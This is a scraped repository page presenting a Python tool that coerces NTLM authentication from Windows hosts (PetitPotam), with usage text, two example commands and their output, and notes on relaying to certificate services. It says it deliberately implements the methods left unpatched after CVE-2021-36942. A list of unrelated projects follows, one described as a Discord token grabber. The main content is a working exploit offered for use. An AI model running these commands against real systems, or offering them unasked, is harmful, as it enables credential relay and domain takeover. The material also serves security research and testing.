Python implementation for PetitPotam

Related tags

Third-party APIs WrappersPetitPotam
Overview

PetitPotam

Coerce NTLM authentication from Windows hosts

Installtion

$ pip3 install impacket

Usage

usage: petitpotam.py [-h] [-debug] [-port [destination port]] [-pipe pipe]
                     [-method method] [-target-ip ip address]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                     target path

PetitPotam - Coerce authentication from Windows hosts

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  path                  UNC path for authentication

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -pipe pipe            Named pipe to use (default: lsarpc)
  -method method        Method used for coercing authentication
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use
                        whatever was specified as target. This is useful when
                        target is the NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters. If
                        valid credentials cannot be found, it will use the ones
                        specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will
                        use the domain part (FQDN) specified in the target
                        parameter

Examples

In these examples, the victim is 172.16.19.100 and the attacker is 172.16.19.1

The attack can use impacket-ntlmrelayx to relay the authentication to interesting endpoints, for instance Active Directory Certificate Services Web Enrollment.

By default, a random method will be chosen.

The target may or may not require authentication. These examples were tested on a Windows 2022 server, and no authentication was required.

The UNC path must point to the attacker's listener. Note that if the attacker is not part of the trusted intranet zone, the Windows host will try to authenticate with a null session. This can be circumvented by either using a NETBIOS name or ADIDNS record for the attacker.

Random Method

$ python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Choosing random method
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Specific Method

$ python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Details

PetitPotam was orignally created / discovered by topotam. This exploit is heavily based on the implementation and research from topotam.

If you're using ntlmrelayx and the Windows host connects with an anonymous logon (null) session, please see this pull request to fix the issue. You can confirm the authentication coercion with Responder.

CVE-2021-36942

Microsoft has released a patch for PetitPotam, but only for two of the methods (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv). For that reason, those methods are not implemented in this exploit.

Instead, the other methods (which were not fully implemented by topotam) have been implemented in this exploit.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
GitHub Repository
Official python API for Phish.AI public and private API to detect zero-day phishing websites

phish-ai-api Summary Official python API for Phish.AI public and private API to detect zero-day phishing websites How it Works (TLDR) Essentially we h

Phish.AI 168 May 17, 2022
Get notifications in your Discord server of any software releases from Apple.

Apple Releases Get notifications in your Discord server of any software releases from Apple. Running To locally host your own instance, create a Disco

adam 17 Oct 22, 2022
A Python wrapper around the Twitter API.

Python Twitter A Python wrapper around the Twitter API. By the Python-Twitter Developers Introduction This library provides a pure Python interface fo

Mike Taylor 3.4k Jan 01, 2023
A tool for exporting Telegram group chats into static websites, preserving chat history like mailing list archives.

tg-archive is a tool for exporting Telegram group chats into static websites, preserving chat history like mailing list archives. Preview The @fossuni

Kailash Nadh 400 Dec 27, 2022
Discovery is an open-source Discord Bot with the main features Tickets, Moderation, Giveaways and Reaction roles.

Discovery is an open-source Discord Bot with the main features Tickets, Moderation, Giveaways and Reaction roles.

1 Dec 29, 2021
A repository for 8G server's discord bot

8G Discord-Bot A general-purpose discord bot for the 8G Discord-Server To setup: Create a new file called secrets.py and make it look like this TOKEN=

1 Jan 12, 2022
Simple, yet effective moderator bot for telegram. With reports, logs, profanity filter and more :3

👹 Samurai Telegram Bot Simple, yet effective moderator bot for telegram. With reports, logs, profanity filter and more :3 Description Personal bot, m

Abraham Tugalov 106 Dec 13, 2022
This is a tool to help people to make a bot for labelling images for machine learning projects.

labeller_images_python_telegramBOT This is a bot to help collect data for any machine learning project. It was developed using the python-telegram-bot

Diego Silveira 2 Nov 13, 2021
A Flask & Twilio Secret Santa app.

🎄 ✨ Secret Santa Twilio ✨ 📱 A contactless Secret Santa game built with Python, Flask and Twilio! Prerequisites 📝 A Twilio account. Sign up here ngr

Sangeeta Jadoonanan 5 Dec 23, 2021
🖥️ Windows Batch and powershell Discord Token grabber. Made for Troll (lmao)

Batched-Grabber Windows Batch and powershell Discord Token grabber. Made for Troll ! Setup. 1. pip(3) install numpy colored 2. python(3) Batched.py 3.

Ѵιcнч 41 Nov 01, 2022
Multipurpose Discord bot hosted on replit.com

RockyBot Multipurpose Discord bot hosted on https://replit.com/ Installing Dependencies Install poetry through pip: pip install poetry Then simply exe

Rocky 2 May 18, 2022
A Google Charts API for Python, meant to be used as an alternative to matplotlib.

GooPyCharts A Google Charts API for Python 2 and 3, meant to be used as an alternative to matplotlib. Syntax is similar to MATLAB. The goal of this pr

Sagnik Ghosh 202 Oct 04, 2022
Companion "receiver" to matrix-appservice-webhooks for [matrix].

Matrix Webhook Receiver Companion "receiver" to matrix-appservice-webhooks for [matrix]. The purpose of this app is to listen for generic webhook mess

Kim Brose 13 Sep 29, 2022
A frame to create discord bots (for myself) that uses cogs, JSON, activities, and more.

dpy-frame A frame to create discord bots (for myself) that uses cogs, JSON, activities, and more. NOTE: Documentation is incomplete, so please wait un

Apple Discord 1 Nov 06, 2021
pymobiledevice fork with more recent coding standards and many more features

Description Features Installation Usage Sending your own messages Lockdown messages Instruments messages Example Lockdown services com.apple.instrumen

255 Dec 28, 2022
A Script to automate fowarding all new messages from one/many channel(s) to another channel(s), without the forwarded tag.

Channel Auto Message Post A script to automate fowarding all new messages from one/many channel(s) to another channel(s), without the forwarded tag. C

16 Oct 21, 2022
Discord bot do sprawdzania ceny pizzy.

Discord bot do sprawdzania ceny pizzy w pizzeri Bombola. Umieszczony jest na platformie Heroku, dzięki czemu działa 24/7. Commands List Info: Jako com

1 Sep 18, 2021
Ross Virtual Assistant is a programme which can play Music, search Wikipedia, open Websites and much more.

Ross-Virtual-Assistant Ross Virtual Assistant is a programme which can play Music, search Wikipedia, open Websites and much more. Installation Downloa

Jehan Patel 4 Nov 08, 2021
Telegram bot for stream music or video on telegram

KYURA MUSIC Telegram bot for stream music or video on telegram, powered by PyTgCalls and Pyrogram Help Need Help me to translate this repo, click the

0 Dec 08, 2022
The Most advanced and User-Friendly Google Collab NoteBook to download Torrent directly to Google Drive with File or Magnet Link support and with added protection of Timeout Preventer.

Torrent To Google Drive (UI Added! 😊 ) A Simple and User-Friendly Google Collab Notebook with UI to download Torrent to Google Drive using (.Torrent)

Dr.Caduceus 33 Aug 16, 2022